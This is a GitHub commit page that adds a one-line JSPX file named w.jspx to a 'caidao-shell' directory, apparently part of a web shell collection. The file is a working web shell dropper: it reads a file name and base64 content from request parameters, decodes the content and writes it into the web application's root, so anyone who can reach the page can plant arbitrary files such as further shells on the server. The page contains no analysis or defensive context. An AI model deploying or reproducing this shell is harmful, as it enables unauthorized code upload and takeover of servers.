Skip to content

Commit

Permalink
Create w.jspx
Browse files Browse the repository at this point in the history
  • Loading branch information
tennc committed May 29, 2016
1 parent 4db274e commit 486f74d
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions caidao-shell/w.jspx
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="2.0"><jsp:scriptlet>new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c")));out.close();</jsp:scriptlet></jsp:root>

0 comments on commit 486f74d

Please sign in to comment.